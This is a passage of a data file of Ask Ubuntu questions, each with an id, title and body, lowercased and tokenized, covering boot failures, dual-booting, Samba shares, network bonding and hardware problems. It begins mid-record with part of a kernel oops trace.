13:42:23 sriram kernel : [ 71260.026113 ] ip : [ ] our_mnt+0x16/0x20 sep 25 13:42:23 sriram kernel : [ 71260.026145 ] *pdpt = 0000000000000000 *pde = f000eef3f000eef3 sep 25 13:42:23 sriram kernel : [ 71260.026180 ] oops : 0000 [ # 1 ] smp sep 25 13:42:23 sriram kernel : [ 71260.026206 ] modules linked in : mymodule1 ( of ) mymodule2 ( of ) rfcomm bnep bluetooth coretemp kvm_intel ( f ) kvm ( f ) gpio_ich ppdev ( f ) snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep ( f ) microcode ( f ) snd_pcm ( f ) snd_page_alloc ( f ) snd_seq_midi ( f ) snd_seq_midi_event ( f ) snd_rawmidi ( f ) psmouse ( f ) serio_raw ( f ) lpc_ich snd_seq ( f ) snd_seq_device ( f ) snd_timer ( f ) snd ( f ) i915 video ( f ) drm_kms_helper drm parport_pc ( f ) mac_hid i2c_algo_bit soundcore ( f ) lp ( f ) parport ( f ) r8169 mii ( f ) floppy ( f ) sep 25 13:42:23 sriram kernel : [ 71260.026541 ] cpu : 0 pid : 1025 comm : dhclient tainted : gf o 3.11.0-7-generic # 14-ubuntu sep 25 13:42:23 sriram kernel : [ 71260.026587 ] hardware name : wipro wsg52b55w7-0228/g41mxe , bios 080015 07/06/2011 sep 25 13:42:23 sriram kernel : [ 71260.026628 ] task : f1e28ce0 ti : f1b60000 task.ti : f1b60000 sep 25 13:42:23 sriram kernel : [ 71260.026657 ] eip : 0060 : [ ] eflags : 00010282 cpu : 0 sep 25 13:42:23 sriram kernel : [ 71260.026688 ] eip is at our_mnt+0x16/0x20 sep 25 13:42:23 sriram kernel : [ 71260.026709 ] eax : f6893c10 ebx : f2e67a88 ecx : 00000001 edx : 00000000 sep 25 13:42:23 sriram kernel : [ 71260.026742 ] esi : f1bc83af edi : 00000100 ebp : f1b61bdc esp : f1b61ba0 sep 25 13:42:23 sriram kernel : [ 71260.026774 ] ds : 007b es : 007b fs : 00d8 gs : 00e0 ss : 0068 sep 25 13:42:23 sriram kernel : [ 71260.026802 ] cr0 : 80050033 cr2 : 0000000c cr3 : 01a5d000 cr4 : 000407f0 sep 25 13:42:23 sriram kernel : [ 71260.026835 ] stack : sep 25 13:42:23 sriram kernel : [ 71260.026848 ] c12ac4c6 ffffffff f1b61c10 00000000 f1e28ce0 018d7544 00010000 00000000 sep 25 13:42:23 sriram kernel : [ 71260.026910 ] 00000100 f1bc8300 f1b61be4 f1b61bf0 f1c8e418 f1b61c50 f2e67a88 f1b61c3c sep 25 13:42:23 sriram kernel : [ 71260.026971 ] c12b389a f1b61c14 f1b61c18 c1a89d8c f1b61c10 c109c822 00000000 f1b61bd4 sep 25 13:42:23 sriram kernel : [ 71260.027032 ] call trace : sep 25 13:42:23 sriram kernel : [ 71260.027050 ] [ ] ? aa_path_name+0x266/0x390 sep 25 13:42:23 sriram kernel : [ 71260.027079 ] [ ] aa_path_perm+0x7a/0x230 sep 25 13:42:23 sriram kernel : [ 71260.027106 ] [ ] ? print_prefix+0x62/0xb0 sep 25 13:42:23 sriram kernel : [ 71260.027134 ] [ ] apparmor_file_open+0xe0/0x140 sep 25 13:42:23 sriram kernel : [ 71260.027163 ] [ ] security_file_open+0x1c/0x70 sep 25 13:42:23 sriram kernel : [ 71260.027193 ] [ ] ? lg_local_unlock+0x16/0x20 sep 25 13:42:23 sriram kernel : [ 71260.027222 ] [ ] do_dentry_open+0xf5/0x230 sep 25 13:42:23 sriram kernel : [ 71260.027249 ] [ ] vfs_open+0x3c/0x50 sep 25 13:42:23 sriram kernel : [ 71260.027274 ] [ ] dentry_open+0x3a/0xa0 sep 25 13:42:23 sriram kernel : [ 71260.027302 ] [ ] doscan+0x549/0xb30 [ mymodule1 ] sep 25 13:42:23 sriram kernel : [ 71260.027335 ] [ ] ? cachefind.isra.9+0x91/0x100 [ mymodule1 ] sep 25 13:42:23 sriram kernel : [ 71260.027371 ] [ ] sc_doscan+0x9a/0xb0 [ mymodule1 ] sep 25 13:42:23 sriram kernel : [ 71260.027402 ] [ ] releasehook+0x98/0xc0 [ mymodule1 ] sep 25 13:42:23 sriram kernel : [ 71260.027434 ] [ ] invokecallbacks+0x197/0x2b0 [ mymodule2 ] sep 25 13:42:23 sriram kernel : [ 71260.027468 ] [ ] filereleasehook+0x9f/0xb0 [ mymodule2 ] sep 25 13:42:23 sriram kernel : [ 71260.027501 ] [ ] __fput+0xc2/0x1f0 sep 25 13:42:23 sriram kernel : [ 71260.027524 ] [ ] ____fput+0xd/0x10 sep 25 13:42:23 sriram kernel : [ 71260.027548 ] [ ] task_work_run+0xb1/0xd0 sep 25 13:42:23 sriram kernel : [ 71260.027574 ] [ ] do_exit+0x25d/0x8d0 sep 25 13:42:23 sriram kernel : [ 71260.027599 ] [ ] ? _copy_from_user+0x2c/0x40 sep 25 13:42:23 sriram kernel : [ 71260.027627 ] [ ] ? recalc_sigpending+0x17/0x50 sep 25 13:42:23 sriram kernel : [ 71260.027656 ] [ ] ? dequeue_signal+0x2b/0x170 sep 25 13:42:23 sriram kernel : [ 71260.027683 ] [ ] do_group_exit+0x34/0xa0 sep 25 13:42:23 sriram kernel : [ 71260.027709 ] [ ] get_signal_to_deliver+0x189/0x590 sep 25 13:42:23 sriram kernel : [ 71260.027740 ] [ ] do_signal+0x3a/0x940 sep 25 13:42:23 sriram kernel : [ 71260.027768 ] [ ] ? handle_mm_fault+0x22a/0x310 sep 25 13:42:23 sriram kernel : [ 71260.029088 ] [ ] ? copy_to_user+0x28/0x40 sep 25 13:42:23 sriram kernel : [ 71260.029729 ] [ ] ? poll_select_copy_remaining+0xb8/0x100 sep 25 13:42:23 sriram kernel : [ 71260.029729 ] [ ] ? sys_select+0x9a/0xc0 sep 25 13:42:23 sriram kernel : [ 71260.029729 ] [ ] do_notify_resume+0x67/0x90 sep 25 13:42:23 sriram kernel : [ 71260.029729 ] [ ] work_notifysig+0x30/0x37 sep 25 13:42:23 sriram kernel : [ 71260.029729 ] code : 5d c3 8d 76 00 55 89 e5 66 66 66 66 90 e8 23 fc ff ff 5d c3 90 55 89 e5 66 66 66 66 90 64 8b 15 10 c0 a4 c1 8b 92 b0 03 00 00 5d 4a 0c 39 48 58 0f 94 c0 c3 55 89 e5 56 53 83 ec 10 66 66 66 sep 25 13:42:23 sriram kernel : [ 71260.029729 ] eip : [ ] our_mnt+0x16/0x20 ss : esp 0068 : f1b61ba0 sep 25 13:42:23 sriram kernel : [ 71260.029729 ] cr2 : 000000000000000c sep 25 13:42:23 sriram kernel : [ 71260.045607 ] -- - [ end trace 55a3efa0765d1484 ] -- - sep 25 13:42:23 sriram kernel : [ 71260.045608 ] fixing recursive fault but reboot is needed !
359922	i can not get in the recovery mode	i tried to change password in ubuntu and i was successfully but i forgot to check username i have forgotten too . unluckily , i do n't understand why , the system does not display anymore the interface in which i can choose the `` recovery mode '' , although i have already done it some times ( in fact , i managed to change password ) following the simple instructions of users on the internet : holding shift key at reboot , basically . i would like to point out that i have two operating systems . why can not i get access to the list of choices anymore ?
359925	display just blinks after installing lubuntu	i want to learn about ubuntu by installing it on an old laptop . it 's an amd sempron 3000 , 792mhz 448 mb ram . i burned the default iso and booted up . it chugs along for a couple minutes , then i just see the screen blinking showing a mouse pointer for a milisec , then blinks away , then back ... i looked for answers and found suggestions to try lubuntu and the alternate install . i tried that , and it did walk through all the text menu steps to install . now when i boot i get a grub menu and when i select ubuntu , all i get it that same blinking screen with a brief flash of a graphic pointer every couple seconds . i looked for answers again and i found something about boot parameters to help the video , but i do n't know what to do . my video is sis m760gx . any ideas ?
359929	i ca n't install lubuntu 13.04 and 12.04 . do n't boot what im missing ?	some week ago i 've installed ubuntu on my more powerful pc , and now then i 've decided to install lubuntu on my olds pc . but i have a problem boot them , with ubuntu i does not have any problem booting it with a sd card . but now i use a usb flash drive because this old pc does not have sd port , i downloaded first the 13.04 version i tried to boot it but when i select the usb flash drive , this got to a black screen with a `` _ '' on top left and never never happens something . i tried with 12.04 too but happened the same ! : o i used unetbootin and burned the .iso to a cd , i tried with the `` cd boot helper '' on wubi and when this finished extracting all files gave me this error : could not retrieve the required installation files . here is the 13.04 wubi log . 13.04 wubi log and here is the 12.04 wubi log wubi log 12.04 i ca n't understand , never happen to me this problem of booting os , and the downloads finished correctly . please help me , what i 'm missing ? sorry for my bad english , im from latin america and 16 years old thanks ! ! edit : tried 3 differents pc 's : c i 'm so noob
359934	can i restart gnome without closing open programs ?	sometimes gnome ( or is that x server ) crashes when i open certain programs ( most recently gparted ) - or for example full-screen youtube crashes thanks to the graphics driver . in these instances i want to get into ctrl+alt+f1 and run some magic command to restart my x server / gnome and make it usable again . unfortunately , sudo restart lightdm appears to log me out . this closes any open programs . is there an alternative solution where i can simply restart my gui and the programs stay intact ? for example in windows i can open the task manager and kill explorer.exe - it restarts itself and all the programs are still open - they even get their icons on the taskbar back .
359937	ubuntu installer doesnt recognize windows8	i tried to install 13.04 alongside my win8 install but i keep getting a message that there is now os detected on my machine . help please . ive ran check disk with no errors .
359939	create bootable disc	i have created a bootable cd of the latest server version 32bit as the machine i 'm installing to is only a 32bit machine . during install receive the message can not mount cd i can not create a bootable desktop version as the download file is 707mb . i did try putting this onto a dvd and got the same error . i am unable to use a memory stick as the usb ports appear to be faulty . i have the latest version on cd from the linux mag but this is a 64bit version . what are my options please ?
359941	install windows 7 from usb	i 've just installed ubuntu 12.04 lts , and after a little work , i found out i want to have it dualbooting with windows 7 . after more work , the forums and posts say it 's a good idea to have windows on first , then add ubuntu . so i got my copy of windows 7 ( known working ) and made a bootable usb stick with it . when i attempt to boot from the usb stick , i get a black screen for a couple of seconds , then ubuntu boots . when i attempt to start install from ubuntu by running `` setup.exe '' in wine , it tells me it can not find a place to store temporary files . how do i use this stick to clear my hard drive and install windows 7 so i can install ubuntu 12.04 lts afterwards ?
359942	samsung 40 '' tv showing `` samsung electric 7 '' '' in display settings	apologies if this has been asked before , but i have looked for a long while trying to find a similar query to this , but i ca n't see , to find one , especially one with an answer ... this is also a long shot . basically , i have a acer revo rl80 which has intel hd graphics card . i set up my system on my 27 '' samsung tv , and everything looked fantastic . i then brought this downstairs to put on my 40 '' tv via hdmi , but when i log in to ubuntu , it says its a samsung electric 7 '' and the picture size is far too big for my tv . i have looked into scaling , drivers etc etc but am at a loss now . any suggestions , advice etc would be greatly appreciated , as i am at a loss with where to go next
359947	vlans in ubuntu 12.04.3 bonding are down after boot	my issue is the following : i 've got two 10 gig interfaces that i need to use in bonding - lacp - mode 4 . here is my config : mypc # cat /etc/network/interfaces auto lo iface lo inet loopback auto eth1 iface eth1 inet manual bond-master bond0 auto eth5 iface eth5 inet manual bond-master bond0 auto bond0 iface bond0 inet manual bond-mode 4 bond-miimon 100 bond-lacp-rate fast mtu 11000 bond-slaves none auto bond0.10 iface bond0.10 inet static address 10.0.0.30 netmask 255.255.255.0 gateway 10.0.0.1 mtu 11000 vlan-raw-device bond0 auto bond0.20 iface bond0.20 inet static address 10.0.1.31 netmask 255.255.255.0 gateway 10.0.1.1 mtu 11000 vlan-raw-device bond0 dns-nameservers 8.8.8.8 mypc # cat /etc/modprobe.d/bonding.conf alias bond0 bonding bonding mode=4 lacp_rate=1 miimon=100 max_bonds=1 probe bonding mypc # cat /etc/modules bonding 8021q as you can see from the subject the interfaces bond0.10 and bond0.20 remain down after boot .
359949	window decoration and multi touch problems on cold boot	not sure whether this has been answered , but i have n't been able to find it , so if someone knows where the relevant thread is , please do direct me to it . this morning , ubuntu froze when i opened a new website in chrome ( as it does every now and then ; almost always with chrome or skype ) . at this point i had to power down the machine and power it up again using the power button ( i.e . cold boot ) . unfortunately , i now have window decorations that look like they did 10 years ago on most *nix computers , and two finger scrolling and tap click ( with one or two fingers ) seem to have been deactivated . i 've put a screenshot here : https : //docs.google.com/file/d/0b_e3nf5aqocrmmryuutix05jslk/edit ? usp=sharing not sure how to get these back , and i 'd prefer not to have to reboot , as i 'd have to reinstall everything plus sort out all my vm settings ( ubuntu host , windows 7 vm ) . thanks in advance !
359951	java 7 download from ubuntu software center	i can not download java 7 from ubuntu software center . it says : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . '' what can i do to solve this ?
359952	lenovo b590 shuts down unexpectedly	this seems like a duplicate but it is not . i have a lenovo b590 which i bought 1 month ago . yesterday , it started shutting down , at first , i thought it would be a software issue and i installed ubuntu 13.04 ( by 12.04 ) , but the problem was there too and then reinstalled 12.04 . today , i contacted friend that told me to check the cpu temperature and stop putting the laptop on my legs because i block the air and the cpu heats a lot . i found it a good idea and i stopped it . for lots of hours nothing happened but then , unexpectedly , it did it again . i checked the cpu temperature via terminal and nothing was more than 40 degrees with the fan not working at all . the temperature was actually low . i made a final test and put the laptop on my legs again and actually tried to block the air and then the shutdown window appeared 2-3 times in a row with my cpu ... actully being in 40 degrees ! ! ! ! i am really confused , i do not even know if the position of the laptop has a relation with it because the temperature was low . i am a newbie in ubuntu so please provide analytic explanations if possible .
359953	how to start putty in a maximized window ?	how to start putty in a maximized window in ubuntu 12 ? when i use windows , i use this method but in ubuntu , i do n't have this option .
359954	unpacking rar file gives empty folder	i have a kinda weird problem . i have ubuntu 13.04 x86-64 installed with everything default and updated . i have installed unrar-free to unpack a rar file containing files . when opening the file with archive manager all the files are inside the rarfile . but when i extract them to a new folder with the folder remains empty . any suggestions ?
359956	sharing between ubuntu 12.04 and windows8 with online user	i 've searched for solutions and tried numerous things but nothing so far has worked . i 'm trying to access shares on an ubuntu 12.04 pc from my windows 8 pc . in my win8 machine i can see the shares , but when i try to access them i get the dreaded `` you do not have permission to access ... '' i have samba installed of course and i have edited the conf in numerous ways according to solutions . i also tried installing samba server configuration to no avail . nothing has worked . any clues ? here 's my smb.conf : # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # a well-established practice is to name the original file # `` smb.conf.master '' and create the `` real '' config file with # testparm -s smb.conf.master > smb.conf # this minimizes the size of the really used smb.conf file # which , according to the samba team , impacts performance # however , use this with caution if your smb.conf file contains nested # `` include '' statements . see debian bug # 483187 for a case # where using a master file is not a good idea . # # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = workgroup # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = yes # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = wins lmhosts host bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . # security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . ; encrypt passwords = yes # if you are using encrypted passwords , samba will need to know what # password database type you are using . ; passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes username map = /etc/samba/smbusers security = user ; guest ok = no ; guest account = nobody # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permiss
359957	stuck in grub rescue mode after installing ubuntu alongside windows 8	i tried to install ubuntu 13.04 on my new lenovo g500 which came pre-installed with windows 8 . i shrunk the main os ( win 8 ) partition and then disabled fast boot in the power options in win 8 . then i entered the uefi and changed the mode to legacy mode . then booted from the live usb drive and installed ubuntu . during installation i created 2 mount points ( / and swap ) and when i tried to proceed it warned me of a requirement to have another boot partition of 1mb in size . i did that too . may be this was a mistake ( dont know ) . then tried to run ubuntu and things were fine . restarted the laptop to see if win 8 also worked . it did not and was asking to insert the win 8 disk . i recalled there was a boot repair utility for ubuntu . i installed that and tried to repair the boot partition so that both os would boot normally . the boot repair utility changed the mode to uefi ( i saw that happening ) and then when i restarted the laptop i got the following message error : file '/boot/grub/i386-pc/normal.mod ' not found grub rescue > now the problem is that i am not able to restore my system . i am not able to get into the bios . nor does the laptop recognize a live usb drive , nor do i have a windows installer cd . can anyone help me with this situation ?
359958	extensions are turned off after reboot	i am running ubuntu gnome 13.10 with gnome 3.10 . my problem is that every time i reboot the os all the shell extensions are turned off . the weird thing is that their settings are kept . they are just turned off and i have to re-enable them every time . how can i make them persistent . thanks update today ubuntu 13.10 was officially released and after i upgraded , my problem is still there . here is my system info : $ uname -a linux ubuntu-desktop 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux any ideas ? sidenote - can someone please tell me at least were the settings of the state of the extensions ( on/off ) are stored ? i have removed all the extensions rm -r ~/.local/share/gnome-shell/extensions/* rm -r /usr/share/gnome-shell/extensions/* and i installed the ones i use . so i am thinking of creating a cronjob and enabling all of them everytime the system boots . at least until i find how to fix this .
359959	dual booting using ubantu12.04	i have 3 operating systems on my pc windows xp , windows7 and ubantu12.04.my windows 7 crashed.whenver i tried to start my windows7 it is showing repair os option.so i formated the drive where windows 7 was installed and reinstalled windows 7.it installed fine and working as expected.but now the problem is when i start my pc it does n't show ubantu bootloader it shows directly winxp and win7 options.i think loader of linus was deleted.how to get back that loader.i do n't want to loose my data which is in my ubantu os . thanks in advance .
359961	manually start kerio vpn	i 've installed kerio vpn client for my ubuntu ( 13.04 x64 ) . it starts automatically on system startup . ( manual ) i want to be able to control it manually . update i do n't want it to start automatically . actually i wa n't to disable its automatic startup and then start it whenever i want . i 've used some configuration tools to disable automatic startup but it never get started manually .
359962	not getting grub selection menu while booting ubuntu from usb	i am tring to boot ubuntu 13.04 desktop from usb , right now i do n't have any os , after entering boot device selection when i select boot from usb nothing happens , blank screen comes with a blinking cursor , not even that selection menu is coming where we can select `` try ubuntu '' or `` install ubuntu '' option . please help me out thanks in advance .
359964	sony vaio vpcea25fg overheating with ubuntu	i am using a 'sony vaio vpcea25fg ' laptop , which is overheating quickly , when i work in ubuntu , but if i switch to windows 8 then it works nicely . my laptop is with ati radeon graphics card . my laptop battery finished very quickly when i work on ubuntu 13.04 . i have tried ubuntu earlier versions also but i got the same problem . is there anything i can do about it ?
359968	install 13.04 on w7 aborts	i have an dvd with an iso of 13.04 . i 've installed it twice on older machines ( hp nc6320 & fu=ijsu lifebook , both w7 ) but on my samsung r530 , also w7 the same dvd breaks off the installation after the network screen . anyone anidea why ?
359975	create partition on new raid1 hardware	in future , i 'll need to add more 2 disks over raid1 on my ubuntu server . i already has a raid1 , but i have more 2 slots in my server and i 'll put there more 2 disks to create another raid1 . i never did it , the only thing i did is simply add normal disks ( not in raid ) . my concern is will i need to do something different from the traditional ? something like , first activate the raid ( as i did when i was installing the ubuntu in the currently raid1 ) . or this will be automatic and i only will need to create the partitions and format them ?
359979	i was given a laptop with a corrupted xp os on it -- like to install ubuntu	i was recently given a laptop with a `` corrupted '' xp os on it , according to the old owner . from what he says , xp will start to boot and then completely crash . i have n't seen the laptop yet , but i 'd like to explore the possibility of wiping the os and installing ubuntu . would this be a possibility ? should i look at burning ubuntu to cd and trying to boot from the cd , or is there a way to get rid of the os mess first , and then try and boot from a blank laptop ? i am not sure how the xp system got corrupted ( whether it 's a virus or perhaps something wrong with the laptop itself ) . any advice or tips on how to approach this ( or whether it 's worth it ) would be greatly appreciated . thank you !
359983	how to fix ubuntu 12.04.3 boot to black screen full of errors in white text , after upgrading on dell inspiron 1501	i am running a dell inspiron 1501 i use linux only . no microsoft or apple operating systems ( or really anything closed-source ) . i 've only been using linux for a little over a year but i 'm starting to gain a comfortable level of familiarity with the system and terminology . i 've been having some issues with quantel quetzal and raring ringtail , especially with older hardware , so i opted to install ubuntu 12.04.3 precise pangolin on the inspiron 1501 . i checked my md5 sum after downloading my iso and all was good . i have in fact used this iso/dvd to install precise pangolin successfully on a few other systems ( some of which are even older than this laptop ) . install goes fine . the wireless card does n't work out of the box but this is a known issue which is fairly easy to fix . so , first thing i did was open up a terminal and run sudo apt-get update & & sudo apt-get upgrade which , part way through , crashed ( i assume lightdm and possibly x ) and took me to a black screen filled with white lines of text that were either errors or just the ouputs of commands . the reason i say that is because i was unable to gleam any useful information from the output on the screen . i did take a picture however and will post a link . after that , every time i boot the system it goes right to that black screen posting all the error messages or output in white text . i never get a purple ubuntu splash , so from what i can tell after reading this wiki article : https : //wiki.ubuntu.com/x/troubleshooting/blankscreen that means that after the kernel is selected , it is unable to correctly implement the settings it needs . if the purple splash never shows , the frame buffer was never set correctly right ? this leads me to believe that it could be a kernel issue ? the wiki suggested to try and pinpoint the issue by rolling back kernels until i find one that works . is this my best option ? i think i 'm going to give it a try anyways and will let everyone know if i am able to solve the issue this way . i have since done a few reinstalls and some trouble-shooting including a couple hours scouring the net for anyone with any kind of similar issue . most of the issues i could find involved getting a black screen after login and none of them said anything about any information output on this black screen . my reinstalls have taught me that there is no issue updating , but as soon as i run sudo apt-get upgrade my system goes to the black screen and every time i boot it up it does the same thing . the only way to fix is by reinstall . i never get any ability to log in . after a hard power off to the laptop ( because i can not use ctrl+alt+del to reboot ) when it boots again it goes to the grub boot menu and i can select between regular boot , recovery mode and the two memtest options . i never tried the memtest options but the other two both lead to the same black screen . some people having a black/blank screen issue claim to have fixed it by using 12.10 or 13.04 but i believe they were having a different issue where they got a black/blank screen after logging in . i think i will still give these images a try , but mostly figured i would just wait another day or two for 13.10 . other things i figured i would try from the following three articles : after logging in , there 's a black screen and my cursor , nothing else ! in ubuntu 12.10 black screen on login after upgrading to 12.04 i ca n't get to the login screen include opening a terminal using ctrl+alt+f1 and trying a variety of reseting unity , x settings , lightdm ( or switching to gdm ) ; but i doubt this will work or that i will even be able to access a terminal . i 'm pretty sure the whole system is stuck after it loads the last line on the black screen . i will try these things and post more information when i have . hopefully someone has an idea in the meantime and i will keep checking back trying to find a solution . thank you . here are 3 different pictures of the error message . i had to take with my phone : http : //ubuntuone.com/album/0tbbkxmvajjiqqton9mvdn
359985	running windows 7/8 as kvm virtual machine on ubuntu	i have installed ubuntu alongside windows 7/8 on my machine . is it possible to run my windows instance as a kvm virtual machine ? do i have to install windows again in kvm ?
359987	boot to usb hd with linux on a macbook	so i have a macbook , and it 's dual-booted ... .i almost never use macos , and i like windows , but rails is close to impossible to install on it , and so far my experience with it on osx has n't been that much better . i 've decided to switch to linux as a development system , as i 've had very good experiences doing so in the past . the obvious answer is to triple boot , but i do n't really have enough hd space for doing that well , and when i investigated the process , it seemed even more complex than trying to get rails and mysql to run on windows correctly . so i decided i would simply take an older external usb hard drive , and install ubuntu ( or mint , or whatever , it does n't really matter , as long as it 's debian based ) to my drive . i tried booting into a live cd , partitioned the drive ( ext4 ) , then installed linux to it . so far so good , but now , i can not select it on the startup screen - it does n't appear to apple 's bootloader as a bootable drive . so how do i go about making this work ?
359988	how to have a volume control/widget in awesome wm ?	simple question but hard answer , i searched around in google a solution to make a dynamic widget to control and see the volume with awesome window manager but i ca n't find a working solution . any one got a solution to this ?
359989	ubuntu 13.10 , bumblebee and power management problem	first of all my laptop is asus n55sf with ubuntu 13.10 . i 've installed bumblebee and it 's working quite good ( i 've tried e.g . optirun firefox and it 's working fine ) . right now i have problem with power management . in windows 7 my battery lasted for at least 3 hours and in ubuntu is more or less only 1 hour . i 'm not so advanced ubuntu user , so i need your help . do i need to change some settings or install some additional software ?
359991	why ca n't i connect to new wireless networks ?	i use ubuntu for a while now , and never had problems , i use ubuntu 12.04 lts and my wireless card is a broadcom bcm4313 . i can connect only to networks that i have already connected , and i just ca n't connect to new ones . can anybody help ?
359992	how to install plugin in browser for video call in facebook	my question is how i can do video calls on facebook ? i recently installed ubuntu 12.04 . i really like the os but i can not make video calls on facebook and this is terrible .
359993	ubuntu installation does n't recognise windows 7 partition ?	when i bought my new laptop it already came with windows 7 installed- however , i always prefer to install my own partition . so i deleted ( during the windows 7 installation ) as many of the existing partitions as i could so that i just had three remaining- 100gb for win 7 , 20gb for future ubuntu and something like 100mb it wouldnt let me delete . windows 7 is installed fine , however i have ubuntu on a usb stick ( which has installed to previous laptops in the past with no problems ) and when i select to install ubuntu it tells me no other operating systems can be detected . obviously i dont want it to overwrite my windows 7- but i have no idea what i can do . i 'm not an expert with linux , so any suggestions/instructions please bear this in mind . thanks ,
359994	problem with automatic login on ubuntu 13.10	automatic login does not remain when i reboot ubuntu 13.10 . if i check user accounts the 'off ' box is selected by default . each time i reselect 'on ' it lasts for as long as that session then goes back to 'off ' the next time i log in .
